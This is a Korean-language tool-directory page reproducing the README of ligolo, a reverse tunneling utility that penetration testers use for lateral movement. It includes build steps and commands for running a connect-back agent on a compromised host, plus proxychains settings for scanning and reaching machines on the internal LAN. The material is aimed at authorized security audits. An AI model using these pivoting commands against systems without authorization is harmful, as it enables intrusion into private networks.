Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ligolo — 리버스 터널링, 침투 테스터를 위해 침투 테스터가 만든 간편한 도구 https://sysdream.com/ | Kitploit
도구/GitHubGitHub/sysdream/ligolo
Lateral MovementPenetration TestingRed Teaming
GitHubsysdream/ligolo

ligolo

리버스 터널링, 침투 테스터를 위해 침투 테스터가 만든 간편한 도구 https://sysdream.com/

저장소 보기
1.8k227616년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Ligolo : 침투 테스터를 위한, 침투 테스터가 만든 리버스 터널링

forthebadge forthebadge

Ligolo

목차

  • 소개
  • 사용 사례
  • 빠른 데모
  • 성능
  • 사용법
    • 설정 / 컴파일
    • 사용 방법?
    • 요약
    • 옵션
  • 기능
  • 할 일
  • 라이선스
  • 크레딧

소개

Ligolo는 역방향 연결에서 SOCKS5 또는 TCP 터널을 완전한 안전성(타원 곡선 TLS 인증서)으로 설정하기 위한 간단하고 가벼운 도구입니다.

이는 Autoroute + Socks4a를 사용하는 Meterpreter와 비슷하지만, 더 안정적이고 빠릅니다.

사용 사례

외부 감사 중 Windows / Linux / Mac 서버를 침투했습니다. 이 서버는 LAN 네트워크 내부에 있으며, 이 네트워크의 다른 머신에 연결을 설정하려고 합니다.

Ligolo는 내부 서버의 리소스에 접근할 수 있는 터널을 설정할 수 있습니다.

빠른 데모

Proxychains를 사용한 RDP 연결 릴레이 (WAN).

RDP

성능

다음은 두 대의 100mb/s 호스트(ligolo / localrelay) 간 속도 테스트 스크린샷입니다. 성능은 시스템 및 네트워크 구성에 따라 다를 수 있습니다.

Speedtest

사용법

설정 / 컴파일

Go가 설치되어 있고 작동 중인지 확인하십시오.

  1. Ligolo 및 종속성 가져오기
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
  1. 자체 서명된 TLS 인증서 생성 (certs 폴더에 배치됨)
make certs TLS_HOST=example.com

참고: build를 호출할 때 TLS_CERT make 옵션을 사용하여 자체 인증서를 사용할 수도 있습니다. 예: make build-all TLS_CERT=certs/mycert.pem.

  1. 빌드
  • 3.1. 모든 아키텍처용
make build-all
  • 3.2. (또는) 현재 아키텍처용
make build

사용 방법?

Ligolo는 두 개의 모듈로 구성됩니다:

  • localrelay
  • ligolo

Localrelay는 제어 서버(공격자 서버)에서 실행하도록 설계되었습니다.

Ligolo는 대상 컴퓨터에서 실행할 프로그램입니다.

localrelay의 경우 기본 옵션을 그대로 사용할 수 있습니다. 모든 인터페이스의 포트 5555에서 수신 대기하며 ligolo의 연결을 기다립니다(-relayserver 매개변수).

ligolo의 경우 -relayserver ip:port 매개변수를 사용하여 릴레이 서버(또는 공격 서버)의 IP 주소를 지정해야 합니다.

도움말을 보려면 -h 옵션을 사용하십시오.

Ligolo와 LocalRelay 간의 연결이 설정되면 릴레이 서버의 TCP 포트 1080에 SOCKS5 프록시가 설정됩니다(-localserver 옵션을 사용하여 TCP 주소/포트를 변경할 수 있습니다).

그런 다음 원하는 도구(예: Proxychains)를 사용하여 클라이언트의 LAN 네트워크를 탐색하기만 하면 됩니다.

요약

공격 서버에서:

./bin/localrelay_linux_amd64

침투한 호스트에서:

> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

연결이 설정되면 ProxyChains 구성 파일(공격 서버)에 다음 매개변수를 설정합니다:

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5     127.0.0.1 1080

성공.

$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123

옵션

Localrelay 옵션:

Usage of localrelay:
  -certfile string
    	The TLS server certificate (default "certs/server.crt")
  -keyfile string
    	The TLS server key (default "certs/server.key")
  -localserver string
    	The local server address (your proxychains parameter) (default "127.0.0.1:1080")
  -relayserver string
    	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

Ligolo 옵션:

Usage of ligolo:
  -autorestart
    	Attempt to reconnect in case of an exception
  -relayserver string
    	The relay server (the connect-back address) (default "127.0.0.1:5555")
  -skipverify
    	Skip TLS certificate pinning verification
  -targetserver string
    	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

기능

  • TLS 핀 고정이 있는 TLS 1.3 터널
  • 다중 플랫폼 (Windows / Linux / Mac / ...)
  • 멀티플렉싱 (모든 흐름에 대해 1개의 TCP 연결)
  • SOCKS5 프록시 또는 단순 릴레이

할 일

  • 더 나은 타임아웃 처리
  • SOCKS5 UDP 지원
  • mTLS 구현

라이선스

GNU General Public License v3.0 (LICENSING 참조).

크레딧

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>

Sysdream

도구 다운로드